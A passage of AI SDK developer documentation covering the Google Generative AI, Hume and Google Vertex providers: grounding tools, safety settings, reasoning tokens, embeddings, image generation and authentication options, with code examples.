- endTime: End time in ISO 8601 format (e.g. '2025-12-31T23:59:59Z').

google.tools.googleSearch({
  searchTypes: { webSearch: {} },
  timeRangeFilter: {
    startTime: '2025-01-01T00:00:00Z',
    endTime: '2025-12-31T23:59:59Z',
  },
});

When Google Search grounding is enabled, the model will include sources in the response.

Additionally, the grounding metadata includes detailed information about how search results were used to ground the model's response. Here are the available fields:

webSearchQueries (string[] | null)
- Array of search queries used to retrieve information
- Example: ["What's the weather in Chicago this weekend?"]
searchEntryPoint ({ renderedContent: string } | null)
- Contains the main search result content used as an entry point
- The renderedContent field contains the formatted content
groundingSupports (Array of support objects | null)
- Contains details about how specific response parts are supported by search results
- Each support object includes:
  - segment: Information about the grounded text segment
    - text: The actual text segment
    - startIndex: Starting position in the response
    - endIndex: Ending position in the response
  - groundingChunkIndices: References to supporting search result chunks
  - confidenceScores: Confidence scores (0-1) for each supporting chunk

Example response:

{
  "groundingMetadata": {
    "webSearchQueries": ["What's the weather in Chicago this weekend?"],
    "searchEntryPoint": {
      "renderedContent": "..."
    },
    "groundingSupports": [
      {
        "segment": {
          "startIndex": 0,
          "endIndex": 65,
          "text": "Chicago weather changes rapidly, so layers let you adjust easily."
        },
        "groundingChunkIndices": [0],
        "confidenceScores": [0.99]
      }
    ]
  }
}

File Search

The File Search tool lets Gemini retrieve context from your own documents that you have indexed in File Search stores. Only Gemini 2.5 models support this feature.

import { google } from '@ai-sdk/google';
import { generateText } from 'ai';

const { text, sources } = await generateText({
  model: google('gemini-2.5-pro'),
  tools: {
    file_search: google.tools.fileSearch({
      fileSearchStoreNames: [
        'projects/my-project/locations/us/fileSearchStores/my-store',
      ],
      metadataFilter: 'author = "Robert Graves"',
      topK: 8,
    }),
  },
  prompt: "Summarise the key themes of 'I, Claudius'.",
});

File Search responses include citations via the normal sources field and expose raw grounding metadata in providerMetadata.google.groundingMetadata.

URL Context

Google provides a provider-defined URL context tool.

The URL context tool allows you to provide specific URLs that you want the model to analyze directly in from the prompt.

import { google } from '@ai-sdk/google';
import { generateText } from 'ai';

const { text, sources, providerMetadata } = await generateText({
  model: google('gemini-2.5-flash'),
  prompt: `Based on the document: https://ai.google.dev/gemini-api/docs/url-context.
          Answer this question: How many links we can consume in one request?`,
  tools: {
    url_context: google.tools.urlContext({}),
  },
});

const metadata = providerMetadata?.google as
  | GoogleGenerativeAIProviderMetadata
  | undefined;
const groundingMetadata = metadata?.groundingMetadata;
const urlContextMetadata = metadata?.urlContextMetadata;

The URL context metadata includes detailed information about how the model used the URL context to generate the response. Here are the available fields:

urlMetadata ({ retrievedUrl: string; urlRetrievalStatus: string; }[] | null)
- Array of URL context metadata
- Each object includes:
  - retrievedUrl: The URL of the context
  - urlRetrievalStatus: The status of the URL retrieval

Example response:

{
  "urlMetadata": [
    {
      "retrievedUrl": "https://ai-sdk.dev/providers/ai-sdk-providers/google-generative-ai",
      "urlRetrievalStatus": "URL_RETRIEVAL_STATUS_SUCCESS"
    }
  ]
}

With the URL context tool, you will also get the groundingMetadata.

"groundingMetadata": {
    "groundingChunks": [
        {
            "web": {
                "uri": "https://ai-sdk.dev/providers/ai-sdk-providers/google-generative-ai",
                "title": "Google Generative AI - AI SDK Providers"
            }
        }
    ],
    "groundingSupports": [
        {
            "segment": {
                "startIndex": 67,
                "endIndex": 157,
                "text": "**Installation**: Install the `@ai-sdk/google` module using your preferred package manager"
            },
            "groundingChunkIndices": [
                0
            ]
        },
    ]
}

You can add up to 20 URLs per request.

Combine URL Context with Search Grounding

You can combine the URL context tool with search grounding to provide the model with the latest information from the web.

import { google } from '@ai-sdk/google';
import { generateText } from 'ai';

const { text, sources, providerMetadata } = await generateText({
  model: google('gemini-2.5-flash'),
  prompt: `Based on this context: https://ai-sdk.dev/providers/ai-sdk-providers/google-generative-ai, tell me how to use Gemini with AI SDK.
    Also, provide the latest news about AI SDK V5.`,
  tools: {
    google_search: google.tools.googleSearch({}),
    url_context: google.tools.urlContext({}),
  },
});

const metadata = providerMetadata?.google as
  | GoogleGenerativeAIProviderMetadata
  | undefined;
const groundingMetadata = metadata?.groundingMetadata;
const urlContextMetadata = metadata?.urlContextMetadata;

Google Maps Grounding

With Google Maps grounding, the model has access to Google Maps data for location-aware responses. This enables providing local data and geospatial context, such as finding nearby restaurants.

import { google } from '@ai-sdk/google';
import { GoogleGenerativeAIProviderMetadata } from '@ai-sdk/google';
import { generateText } from 'ai';

const { text, sources, providerMetadata } = await generateText({
  model: google('gemini-2.5-flash'),
  tools: {
    google_maps: google.tools.googleMaps({}),
  },
  providerOptions: {
    google: {
      retrievalConfig: {
        latLng: { latitude: 34.090199, longitude: -117.881081 },
      },
    },
  },
  prompt:
    'What are the best Italian restaurants within a 15-minute walk from here?',
});

const metadata = providerMetadata?.google as
  | GoogleGenerativeAIProviderMetadata
  | undefined;
const groundingMetadata = metadata?.groundingMetadata;

The optional retrievalConfig.latLng provider option provides location context for queries about nearby places. This configuration applies to any grounding tools that support location context, including Google Maps and Google Search.

When Google Maps grounding is enabled, the model's response will include sources pointing to Google Maps URLs. The grounding metadata includes maps chunks with place information:

{
  "groundingMetadata": {
    "groundingChunks": [
      {
        "maps": {
          "uri": "https://maps.google.com/?cid=12345",
          "title": "Restaurant Name",
          "placeId": "places/ChIJ..."
        }
      }
    ]
  }
}

Google Maps grounding is supported on Gemini 2.0 and newer models.

RAG Engine Grounding

With RAG Engine Grounding, the model has access to your custom knowledge base using the Vertex RAG Engine. This enables the model to provide answers based on your specific data sources and documents.

import { createVertex } from '@ai-sdk/google-vertex';
import { GoogleGenerativeAIProviderMetadata } from '@ai-sdk/google';
import { generateText } from 'ai';

const vertex = createVertex({
  project: 'my-project',
  location: 'us-central1',
});

const { text, sources, providerMetadata } = await generateText({
  model: vertex('gemini-2.5-flash'),
  tools: {
    vertex_rag_store: vertex.tools.vertexRagStore({
      ragCorpus:
        'projects/my-project/locations/us-central1/ragCorpora/my-rag-corpus',
      topK: 5,
    }),
  },
  prompt:
    'What are the key features of our product according to our documentation?',
});

// access the grounding metadata. Casting to the provider metadata type
// is optional but provides autocomplete and type safety.
const metadata = providerMetadata?.google as
  | GoogleGenerativeAIProviderMetadata
  | undefined;
const groundingMetadata = metadata?.groundingMetadata;
const safetyRatings = metadata?.safetyRatings;

When RAG Engine Grounding is enabled, the model will include sources from your RAG corpus in the response.

Additionally, the grounding metadata includes detailed information about how RAG results were used to ground the model's response. Here are the available fields:

groundingChunks (Array of chunk objects | null)
- Contains the retrieved context chunks from your RAG corpus
- Each chunk includes:
  - retrievedContext: Information about the retrieved context
    - uri: The URI or identifier of the source document
    - title: The title of the source document (optional)
    - text: The actual text content of the chunk
groundingSupports (Array of support objects | null)
- Contains details about how specific response parts are supported by RAG results
- Each support object includes:
  - segment: Information about the grounded text segment
    - text: The actual text segment
    - startIndex: Starting position in the response
    - endIndex: Ending position in the response
  - groundingChunkIndices: References to supporting RAG result chunks
  - confidenceScores: Confidence scores (0-1) for each supporting chunk

Example response:

{
  "groundingMetadata": {
    "groundingChunks": [
      {
        "retrievedContext": {
          "uri": "gs://my-bucket/docs/product-guide.pdf",
          "title": "Product User Guide",
          "text": "Our product includes advanced AI capabilities, real-time processing, and enterprise-grade security features."
        }
      }
    ],
    "groundingSupports": [
      {
        "segment": {
          "startIndex": 0,
          "endIndex": 45,
          "text": "Our product includes advanced AI capabilities and real-time processing."
        },
        "groundingChunkIndices": [0],
        "confidenceScores": [0.95]
      }
    ]
  }
}

Configuration Options

The vertexRagStore tool accepts the following configuration options:

ragCorpus (string, required)
- The RagCorpus resource name in the format: projects/{project}/locations/{location}/ragCorpora/{rag_corpus}
- This identifies your specific RAG corpus to search against
topK (number, optional)
- The number of top contexts to retrieve from your RAG corpus
- Defaults to the corpus configuration if not specified

Image Outputs

Gemini models with image generation capabilities (gemini-2.5-flash-image-preview) support image generation. Images are exposed as files in the response.

import { google } from '@ai-sdk/google';
import { generateText } from 'ai';

const result = await generateText({
  model: google('gemini-2.5-flash-image-preview'),
  prompt:
    'Create a picture of a nano banana dish in a fancy restaurant with a Gemini theme',
});

for (const file of result.files) {
  if (file.mediaType.startsWith('image/')) {
    console.log('Generated image:', file);
  }
}

Safety Ratings

The safety ratings provide insight into the safety of the model's response. See Google AI documentation on safety settings.

Example response excerpt:

{
  "safetyRatings": [
    {
      "category": "HARM_CATEGORY_HATE_SPEECH",
      "probability": "NEGLIGIBLE",
      "probabilityScore": 0.11027937,
      "severity": "HARM_SEVERITY_LOW",
      "severityScore": 0.28487435
    },
    {
      "category": "HARM_CATEGORY_DANGEROUS_CONTENT",
      "probability": "HIGH",
      "blocked": true,
      "probabilityScore": 0.95422274,
      "severity": "HARM_SEVERITY_MEDIUM",
      "severityScore": 0.43398145
    },
    {
      "category": "HARM_CATEGORY_HARASSMENT",
      "probability": "NEGLIGIBLE",
      "probabilityScore": 0.11085559,
      "severity": "HARM_SEVERITY_NEGLIGIBLE",
      "severityScore": 0.19027223
    },
    {
      "category": "HARM_CATEGORY_SEXUALLY_EXPLICIT",
      "probability": "NEGLIGIBLE",
      "probabilityScore": 0.22901751,
      "severity": "HARM_SEVERITY_NEGLIGIBLE",
      "severityScore": 0.09089675
    }
  ]
}

Troubleshooting

Schema Limitations

The Google Generative AI API uses a subset of the OpenAPI 3.0 schema, which does not support features such as unions. The errors that you get in this case look like this:

GenerateContentRequest.generation_config.response_schema.properties[occupation].type: must be specified

By default, structured outputs are enabled (and for tool calling they are required). You can disable structured outputs for object generation as a workaround:

const { object } = await generateObject({
  model: google('gemini-2.5-flash'),
  providerOptions: {
    google: {
      structuredOutputs: false,
    },
  },
  schema: z.object({
    name: z.string(),
    age: z.number(),
    contact: z.union([
      z.object({
        type: z.literal('email'),
        value: z.string(),
      }),
      z.object({
        type: z.literal('phone'),
        value: z.string(),
      }),
    ]),
  }),
  prompt: 'Generate an example person for testing.',
});

The following Zod features are known to not work with Google Generative AI:

z.union
z.record

Model Capabilities

Model	Image Input	Object Generation	Tool Usage	Tool Streaming	Google Search	URL Context
`gemini-3.1-pro-preview`
`gemini-3.1-flash-image-preview`
`gemini-3-pro-preview`
`gemini-2.5-pro`
`gemini-2.5-flash`
`gemini-2.5-flash-lite`
`gemini-2.5-flash-lite-preview-06-17`
`gemini-2.0-flash`
`gemini-1.5-pro`
`gemini-1.5-pro-latest`
`gemini-1.5-flash`
`gemini-1.5-flash-latest`
`gemini-1.5-flash-8b`
`gemini-1.5-flash-8b-latest`

Gemma Models

You can use Gemma models with the Google Generative AI API.

Gemma models don't natively support the systemInstruction parameter, but the provider automatically handles system instructions by prepending them to the first user message. This allows you to use system instructions with Gemma models seamlessly:

import { google } from '@ai-sdk/google';
import { generateText } from 'ai';

const { text } = await generateText({
  model: google('gemma-3-27b-it'),
  system: 'You are a helpful assistant that responds concisely.',
  prompt: 'What is machine learning?',
});

The system instruction is automatically formatted and included in the conversation, so Gemma models can follow the guidance without any additional configuration.

Embedding Models

You can create models that call the Google Generative AI embeddings API using the .textEmbedding() factory method.

const model = google.textEmbedding('gemini-embedding-2-preview');

The Google Generative AI provider sends API calls to the right endpoint based on the type of embedding:

Single embeddings: When embedding a single value with embed(), the provider uses the single :embedContent endpoint, which typically has higher rate limits compared to the batch endpoint.
Batch embeddings: When embedding multiple values with embedMany() or multiple values in embed(), the provider uses the :batchEmbedContents endpoint.

Google Generative AI embedding models support additional settings, including multimodal embeddings. You can pass them as an options argument:

import { google } from '@ai-sdk/google';
import { embed } from 'ai';

const model = google.textEmbedding('gemini-embedding-2-preview');

const { embedding } = await embed({
  model,
  value: 'sunny day at the beach',
  providerOptions: {
    google: {
      outputDimensionality: 512, // optional, number of dimensions for the embedding
      taskType: 'SEMANTIC_SIMILARITY', // optional, specifies the task type for generating embeddings
      content: [[{ text: 'additional context' }]], // optional, per-value multimodal content (only 1 here, since `value` is only a single one)
    } satisfies GoogleEmbeddingModelOptions,
  },
});

When using embedMany, provide per-value multimodal content via the content option. Each entry corresponds to a value at the same index; use null for text-only entries:

import { google, type GoogleEmbeddingModelOptions } from '@ai-sdk/google';
import { embedMany } from 'ai';

const { embeddings } = await embedMany({
  model: google.embedding('gemini-embedding-2-preview'),
  values: ['sunny day at the beach', 'rainy afternoon in the city'],
  providerOptions: {
    google: {
      // content array must have the same length as values
      content: [
        [{ inlineData: { mimeType: 'image/png', data: '<base64>' } }], // pairs with values[0]
        null, // text-only, pairs with values[1]
      ],
    } satisfies GoogleEmbeddingModelOptions,
  },
});

The following optional provider options are available for Google Generative AI embedding models:

outputDimensionality: number

Optional reduced dimension for the output embedding. If set, excessive values in the output embedding are truncated from the end.
taskType: string

Optional. Specifies the task type for generating embeddings. Supported task types include:
- SEMANTIC_SIMILARITY: Optimized for text similarity.
- CLASSIFICATION: Optimized for text classification.
- CLUSTERING: Optimized for clustering texts based on similarity.
- RETRIEVAL_DOCUMENT: Optimized for document retrieval.
- RETRIEVAL_QUERY: Optimized for query-based retrieval.
- QUESTION_ANSWERING: Optimized for answering questions.
- FACT_VERIFICATION: Optimized for verifying factual information.
- CODE_RETRIEVAL_QUERY: Optimized for retrieving code blocks based on natural language queries.
content: array

Optional. Per-value multimodal content parts for embedding non-text content (images, video, PDF, audio). Each entry corresponds to the embedding value at the same index — its parts are merged with the text value in the request. Use null for entries that are text-only. The array length must match the number of values being embedded. Each non-null entry is an array of parts, where each part can be either { text: string } or { inlineData: { mimeType: string, data: string } }. Supported by gemini-embedding-2-preview.

Model Capabilities

Model	Default Dimensions	Custom Dimensions	Multimodal
`gemini-embedding-001`	3072
`gemini-embedding-2-preview`	3072

Image Models

You can create Imagen models that call the Google Generative AI API using the .image() factory method. For more on image generation with the AI SDK see generateImage().

import { google } from '@ai-sdk/google';
import { experimental_generateImage as generateImage } from 'ai';

const { image } = await generateImage({
  model: google.image('imagen-4.0-generate-001'),
  prompt: 'A futuristic cityscape at sunset',
  aspectRatio: '16:9',
});

Further configuration can be done using Google provider options. You can validate the provider options using the GoogleGenerativeAIImageProviderOptions type.

import { google } from '@ai-sdk/google';
import { GoogleGenerativeAIImageProviderOptions } from '@ai-sdk/google';
import { experimental_generateImage as generateImage } from 'ai';

const { image } = await generateImage({
  model: google.image('imagen-4.0-generate-001'),
  providerOptions: {
    google: {
      personGeneration: 'dont_allow',
    } satisfies GoogleGenerativeAIImageProviderOptions,
  },
  // ...
});

The following provider options are available:

personGeneration allow_adult | allow_all | dont_allow Whether to allow person generation. Defaults to allow_adult.

Model Capabilities

Model	Aspect Ratios
`imagen-4.0-generate-001`	1:1, 3:4, 4:3, 9:16, 16:9

title: Hume description: Learn how to use the Hume provider for the AI SDK.

Hume Provider

The Hume provider contains language model support for the Hume transcription API.

Setup

The Hume provider is available in the @ai-sdk/hume module. You can install it with

Provider Instance

You can import the default provider instance hume from @ai-sdk/hume:

import { hume } from '@ai-sdk/hume';

If you need a customized setup, you can import createHume from @ai-sdk/hume and create a provider instance with your settings:

import { createHume } from '@ai-sdk/hume';

const hume = createHume({
  // custom settings, e.g.
  fetch: customFetch,
});

You can use the following optional settings to customize the Hume provider instance:

apiKey string

API key that is being sent using the Authorization header. It defaults to the HUME_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Speech Models

You can create models that call the Hume speech API using the .speech() factory method.

const model = hume.speech();

You can also pass additional provider-specific options using the providerOptions argument. For example, supplying a voice to use for the generated audio.

import { experimental_generateSpeech as generateSpeech } from 'ai';
import { hume } from '@ai-sdk/hume';

const result = await generateSpeech({
  model: hume.speech(),
  text: 'Hello, world!',
  voice: 'd8ab67c6-953d-4bd8-9370-8fa53a0f1453',
  providerOptions: { hume: {} },
});

The following provider options are available:

context object

Either:
- { generationId: string } - A generation ID to use for context.
- { utterances: HumeUtterance[] } - An array of utterance objects for context.

Model Capabilities

Model	Instructions
`default`

title: Google Vertex AI description: Learn how to use the Google Vertex AI provider.

Google Vertex Provider

The Google Vertex provider for the AI SDK contains language model support for the Google Vertex AI APIs. This includes support for Google's Gemini models, Anthropic's Claude partner models, and MaaS (Model as a Service) open models.

Setup

The Google Vertex and Google Vertex Anthropic providers are both available in the @ai-sdk/google-vertex module. You can install it with

Google Vertex Provider Usage

Provider Instance

You can import the default provider instance vertex from @ai-sdk/google-vertex:

import { vertex } from '@ai-sdk/google-vertex';

If you need a customized setup, you can import createVertex from @ai-sdk/google-vertex and create a provider instance with your settings:

import { createVertex } from '@ai-sdk/google-vertex';

const vertex = createVertex({
  project: 'my-project', // optional
  location: 'us-central1', // optional
});

Google Vertex supports two different authentication implementations depending on your runtime environment.

Node.js Runtime

If you want to customize the Google authentication options you can pass them as options to the createVertex function, for example:

import { createVertex } from '@ai-sdk/google-vertex';

const vertex = createVertex({
  googleAuthOptions: {
    credentials: {
      client_email: 'my-email',
      private_key: 'my-private-key',
    },
  },
});

Optional Provider Settings

You can use the following optional settings to customize the provider instance:

project string

The Google Cloud project ID that you want to use for the API calls. It uses the GOOGLE_VERTEX_PROJECT environment variable by default.
location string

The Google Cloud location that you want to use for the API calls, e.g. us-central1. It uses the GOOGLE_VERTEX_LOCATION environment variable by default.
googleAuthOptions object

Optional. The Authentication options used by the Google Auth Library. See also the GoogleAuthOptions interface.
- authClient object An AuthClient to use.
- keyFilename string Path to a .json, .pem, or .p12 key file.
- keyFile string Path to a .json, .pem, or .p12 key file.
- credentials object Object containing client_email and private_key properties, or the external account client options.
- clientOptions object Options object passed to the constructor of the client.
- scopes string | string[] Required scopes for the desired API request.
- projectId string Your project ID.
- universeDomain string The default service domain for a given Cloud universe.
headers Resolvable<Record<string, string | undefined>>

Headers to include in the requests. Can be provided in multiple formats:
- A record of header key-value pairs: Record<string, string | undefined>
- A function that returns headers: () => Record<string, string | undefined>
- An async function that returns headers: async () => Record<string, string | undefined>
- A promise that resolves to headers: Promise<Record<string, string | undefined>>
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
baseURL string

Optional. Base URL for the Google Vertex API calls e.g. to use proxy servers. By default, it is constructed using the location and project: https://${location}-aiplatform.googleapis.com/v1/projects/${project}/locations/${location}/publishers/google

Edge Runtime

You can import the default provider instance vertex from @ai-sdk/google-vertex/edge:

import { vertex } from '@ai-sdk/google-vertex/edge';

If you need a customized setup, you can import createVertex from @ai-sdk/google-vertex/edge and create a provider instance with your settings:

import { createVertex } from '@ai-sdk/google-vertex/edge';

const vertex = createVertex({
  project: 'my-project', // optional
  location: 'us-central1', // optional
});

For Edge runtime authentication, you'll need to set these environment variables from your Google Default Application Credentials JSON file:

GOOGLE_CLIENT_EMAIL
GOOGLE_PRIVATE_KEY
GOOGLE_PRIVATE_KEY_ID (optional)

These values can be obtained from a service account JSON file from the Google Cloud Console.

Optional Provider Settings

You can use the following optional settings to customize the provider instance:

project string

The Google Cloud project ID that you want to use for the API calls. It uses the GOOGLE_VERTEX_PROJECT environment variable by default.
location string

The Google Cloud location that you want to use for the API calls, e.g. us-central1. It uses the GOOGLE_VERTEX_LOCATION environment variable by default.
googleCredentials object

Optional. The credentials used by the Edge provider for authentication. These credentials are typically set through environment variables and are derived from a service account JSON file.
- clientEmail string The client email from the service account JSON file. Defaults to the contents of the GOOGLE_CLIENT_EMAIL environment variable.
- privateKey string The private key from the service account JSON file. Defaults to the contents of the GOOGLE_PRIVATE_KEY environment variable.
- privateKeyId string The private key ID from the service account JSON file (optional). Defaults to the contents of the GOOGLE_PRIVATE_KEY_ID environment variable.
headers Resolvable<Record<string, string | undefined>>

Headers to include in the requests. Can be provided in multiple formats:
- A record of header key-value pairs: Record<string, string | undefined>
- A function that returns headers: () => Record<string, string | undefined>
- An async function that returns headers: async () => Record<string, string | undefined>
- A promise that resolves to headers: Promise<Record<string, string | undefined>>
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Language Models

You can create models that call the Vertex API using the provider instance. The first argument is the model id, e.g. gemini-1.5-pro.

const model = vertex('gemini-1.5-pro');

Google Vertex models support also some model specific settings that are not part of the standard call settings. You can pass them as an options argument:

const model = vertex('gemini-1.5-pro');

await generateText({
  model,
  providerOptions: {
    google: {
      safetySettings: [
        {
          category: 'HARM_CATEGORY_UNSPECIFIED',
          threshold: 'BLOCK_LOW_AND_ABOVE',
        },
      ],
    },
  },
});

The following optional provider options are available for Google Vertex models:

structuredOutputs boolean

Optional. Enable structured output. Default is true.

This is useful when the JSON Schema contains elements that are not supported by the OpenAPI schema version that Google Vertex uses. You can use this to disable structured outputs if you need to.

See Troubleshooting: Schema Limitations for more details.
safetySettings Array<{ category: string; threshold: string }>

Optional. Safety settings for the model.
- category string
  
  The category of the safety setting. Can be one of the following:
  - HARM_CATEGORY_UNSPECIFIED
  - HARM_CATEGORY_HATE_SPEECH
  - HARM_CATEGORY_DANGEROUS_CONTENT
  - HARM_CATEGORY_HARASSMENT
  - HARM_CATEGORY_SEXUALLY_EXPLICIT
  - HARM_CATEGORY_CIVIC_INTEGRITY
- threshold string
  
  The threshold of the safety setting. Can be one of the following:
  - HARM_BLOCK_THRESHOLD_UNSPECIFIED
  - BLOCK_LOW_AND_ABOVE
  - BLOCK_MEDIUM_AND_ABOVE
  - BLOCK_ONLY_HIGH
  - BLOCK_NONE
audioTimestamp boolean

Optional. Enables timestamp understanding for audio files. Defaults to false.

This is useful for generating transcripts with accurate timestamps. Consult Google's Documentation for usage details.
labels object

Optional. Defines labels used in billing reports.

Consult Google's Documentation for usage details.

You can use Google Vertex language models to generate text with the generateText function:

import { vertex } from '@ai-sdk/google-vertex';
import { generateText } from 'ai';

const { text } = await generateText({
  model: vertex('gemini-1.5-pro'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

Google Vertex language models can also be used in the streamText function (see AI SDK Core).

Code Execution

With Code Execution, certain Gemini models on Vertex AI can generate and execute Python code. This allows the model to perform calculations, data manipulation, and other programmatic tasks to enhance its responses.

You can enable code execution by adding the code_execution tool to your request.

import { vertex } from '@ai-sdk/google-vertex';
import { generateText } from 'ai';

const result = await generateText({
  model: vertex('gemini-2.5-pro'),
  tools: { code_execution: vertex.tools.codeExecution({}) },
  prompt:
    'Use python to calculate 20th fibonacci number. Then find the nearest palindrome to it.',
});

The response will contain tool-call and tool-result parts for the executed code.

URL Context

URL Context allows Gemini models to retrieve and analyze content from URLs. Supported models: Gemini 2.5 Flash-Lite, 2.5 Pro, 2.5 Flash, 2.0 Flash.

import { vertex } from '@ai-sdk/google-vertex';
import { generateText } from 'ai';

const result = await generateText({
  model: vertex('gemini-2.5-pro'),
  tools: { url_context: vertex.tools.urlContext({}) },
  prompt: 'What are the key points from https://example.com/article?',
});

Google Search

Google Search enables Gemini models to access real-time web information. Supported models: Gemini 2.5 Flash-Lite, 2.5 Flash, 2.0 Flash, 2.5 Pro.

import { vertex } from '@ai-sdk/google-vertex';
import { generateText } from 'ai';

const result = await generateText({
  model: vertex('gemini-2.5-pro'),
  tools: { google_search: vertex.tools.googleSearch({}) },
  prompt: 'What are the latest developments in AI?',
});

Enterprise Web Search

Enterprise Web Search provides grounding using a compliance-focused web index designed for highly-regulated industries such as finance, healthcare, and the public sector. Unlike standard Google Search grounding, Enterprise Web Search does not log customer data and supports VPC service controls. Supported models: Gemini 2.0 and newer.

import { vertex } from '@ai-sdk/google-vertex';
import { generateText } from 'ai';

const result = await generateText({
  model: vertex('gemini-2.5-flash'),
  tools: {
    enterprise_web_search: vertex.tools.enterpriseWebSearch({}),
  },
  prompt: 'What are the latest FDA regulations for clinical trials?',
});

Google Maps

Google Maps grounding enables Gemini models to access Google Maps data for location-aware responses. Supported models: Gemini 2.5 Flash-Lite, 2.5 Flash, 2.0 Flash, 2.5 Pro, 3.0 Pro.

import { vertex } from '@ai-sdk/google-vertex';
import { generateText } from 'ai';

const result = await generateText({
  model: vertex('gemini-2.5-flash'),
  tools: {
    google_maps: vertex.tools.googleMaps({}),
  },
  providerOptions: {
    google: {
      retrievalConfig: {
        latLng: { latitude: 34.090199, longitude: -117.881081 },
      },
    },
  },
  prompt: 'What are the best Italian restaurants nearby?',
});

The optional retrievalConfig.latLng provider option provides location context for queries about nearby places. This configuration applies to any grounding tools that support location context.

Reasoning (Thinking Tokens)

Google Vertex AI, through its support for Gemini models, can also emit "thinking" tokens, representing the model's reasoning process. The AI SDK exposes these as reasoning information.

import { vertex } from '@ai-sdk/google-vertex';
import { GoogleGenerativeAIProviderOptions } from '@ai-sdk/google'; // Note: importing from @ai-sdk/google
import { generateText, streamText } from 'ai';

// For generateText:
const { text, reasoningText, reasoning } = await generateText({
  model: vertex('gemini-2.0-flash-001'), // Or other supported model via Vertex
  providerOptions: {
    google: {
      // Options are nested under 'google' for Vertex provider
      thinkingConfig: {
        includeThoughts: true,
        // thinkingBudget: 2048, // Optional
      },
    } satisfies GoogleGenerativeAIProviderOptions,
  },
  prompt: 'Explain quantum computing in simple terms.',
});

console.log('Reasoning:', reasoningText);
console.log('Reasoning Details:', reasoning);
console.log('Final Text:', text);

// For streamText:
const result = streamText({
  model: vertex('gemini-2.0-flash-001'), // Or other supported model via Vertex
  providerOptions: {
    google: {
      // Options are nested under 'google' for Vertex provider
      thinkingConfig: {
        includeThoughts: true,
        // thinkingBudget: 2048, // Optional
      },
    } satisfies GoogleGenerativeAIProviderOptions,
  },
  prompt: 'Explain quantum computing in simple terms.',
});

for await (const part of result.fullStream) {
  if (part.type === 'reasoning') {
    process.stdout.write(`THOUGHT: ${part.textDelta}\n`);
  } else if (part.type === 'text-delta') {
    process.stdout.write(part.textDelta);
  }
}

When includeThoughts is true, parts of the API response marked with thought: true will be processed as reasoning.

In generateText, these contribute to the reasoningText (string) and reasoning (array) fields.
In streamText, these are emitted as reasoning stream parts.

File Inputs

The Google Vertex provider supports file inputs, e.g. PDF files.

import { vertex } from '@ai-sdk/google-vertex';
import { generateText } from 'ai';

const { text } = await generateText({
  model: vertex('gemini-1.5-pro'),
  messages: [
    {
      role: 'user',
      content: [
        {
          type: 'text',
          text: 'What is an embedding model according to this document?',
        },
        {
          type: 'file',
          data: fs.readFileSync('./data/ai.pdf'),
          mediaType: 'application/pdf',
        },
      ],
    },
  ],
});

See File Parts for details on how to use files in prompts.

Safety Ratings

The safety ratings provide insight into the safety of the model's response. See Google Vertex AI documentation on configuring safety filters.

Example response excerpt:

{
  "safetyRatings": [
    {
      "category": "HARM_CATEGORY_HATE_SPEECH",
      "probability": "NEGLIGIBLE",
      "probabilityScore": 0.11027937,
      "severity": "HARM_SEVERITY_LOW",
      "severityScore": 0.28487435
    },
    {
      "category": "HARM_CATEGORY_DANGEROUS_CONTENT",
      "probability": "HIGH",
      "blocked": true,
      "probabilityScore": 0.95422274,
      "severity": "HARM_SEVERITY_MEDIUM",
      "severityScore": 0.43398145
    },
    {
      "category": "HARM_CATEGORY_HARASSMENT",
      "probability": "NEGLIGIBLE",
      "probabilityScore": 0.11085559,
      "severity": "HARM_SEVERITY_NEGLIGIBLE",
      "severityScore": 0.19027223
    },
    {
      "category": "HARM_CATEGORY_SEXUALLY_EXPLICIT",
      "probability": "NEGLIGIBLE",
      "probabilityScore": 0.22901751,
      "severity": "HARM_SEVERITY_NEGLIGIBLE",
      "severityScore": 0.09089675
    }
  ]
}

For more details, see the Google Vertex AI documentation on grounding with Google Search.

Troubleshooting

Schema Limitations

The Google Vertex API uses a subset of the OpenAPI 3.0 schema, which does not support features such as unions. The errors that you get in this case look like this:

GenerateContentRequest.generation_config.response_schema.properties[occupation].type: must be specified

By default, structured outputs are enabled (and for tool calling they are required). You can disable structured outputs for object generation as a workaround:

const result = await generateObject({
  model: vertex('gemini-1.5-pro'),
  providerOptions: {
    google: {
      structuredOutputs: false,
    },
  },
  schema: z.object({
    name: z.string(),
    age: z.number(),
    contact: z.union([
      z.object({
        type: z.literal('email'),
        value: z.string(),
      }),
      z.object({
        type: z.literal('phone'),
        value: z.string(),
      }),
    ]),
  }),
  prompt: 'Generate an example person for testing.',
});

The following Zod features are known to not work with Google Vertex:

z.union
z.record

Model Capabilities

Model	Image Input	Object Generation	Tool Usage	Tool Streaming
`gemini-2.0-flash-001`
`gemini-2.0-flash-exp`
`gemini-1.5-flash`
`gemini-1.5-pro`

Embedding Models

You can create models that call the Google Vertex AI embeddings API using the .textEmbeddingModel() factory method:

const model = vertex.textEmbeddingModel('text-embedding-004');

Google Vertex AI embedding models support additional settings. You can pass them as an options argument:

import { vertex } from '@ai-sdk/google-vertex';
import { embed } from 'ai';

const model = vertex.textEmbeddingModel('text-embedding-004');

const { embedding } = await embed({
  model,
  value: 'sunny day at the beach',
  providerOptions: {
    google: {
      outputDimensionality: 512, // optional, number of dimensions for the embedding
      taskType: 'SEMANTIC_SIMILARITY', // optional, specifies the task type for generating embeddings
      autoTruncate: false, // optional
    },
  },
});

The following optional provider options are available for Google Vertex AI embedding models:

outputDimensionality: number

Optional reduced dimension for the output embedding. If set, excessive values in the output embedding are truncated from the end.
taskType: string

Optional. Specifies the task type for generating embeddings. Supported task types include:
- SEMANTIC_SIMILARITY: Optimized for text similarity.
- CLASSIFICATION: Optimized for text classification.
- CLUSTERING: Optimized for clustering texts based on similarity.
- RETRIEVAL_DOCUMENT: Optimized for document retrieval.
- RETRIEVAL_QUERY: Optimized for query-based retrieval.
- QUESTION_ANSWERING: Optimized for answering questions.
- FACT_VERIFICATION: Optimized for verifying factual information.
